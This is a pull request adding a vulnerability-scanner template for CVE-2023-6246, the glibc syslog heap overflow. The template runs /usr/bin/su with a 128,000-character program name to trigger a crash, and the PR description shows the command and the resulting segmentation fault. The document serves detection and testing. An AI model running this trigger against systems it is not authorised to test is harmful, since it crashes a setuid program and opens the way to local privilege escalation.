### PR TITLE
Create CVE-2023-6246.yaml

### DIFF
--- a/code/cves/2023/CVE-2023-6246.yaml
+++ b/code/cves/2023/CVE-2023-6246.yaml
@@ -1,0 +1,35 @@
+id: CVE-2023-6246
+
+info:
+  name: glibc's syslog - Local Privilege Escalation
+  author: gy741
+  severity: high
+  description: |
+    A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-6246
+    - https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2023-6246
+    cwe-id: CWE-787
+    cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: glibc
+  tags: cve,cve2023,code,glibc,linux,privesc,local
+
+self-contained: true
+code:
+  - engine:
+      - sh
+      - bash
+    source: |
+      (exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)
+      echo $?
+
+    matchers:
+      - type: word
+        words:
+          - "127"     # Segmentation Fault Exit Code


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2023-6246

```
A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer.
```

- References: https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

```
[DBG] [CVE-2023-6246] Dumped Executed Source Code for

(exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)
echo $?

[DBG] [CVE-2023-6246] Dumped Code Execution for

127

[CVE-2023-6246:word-1] [code] [high]
```

```
$ ldd --version
ldd (Ubuntu GLIBC 2.38-1ubuntu6) 2.38
```

```
$ (exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)
Segmentation fault (core dumped)
```
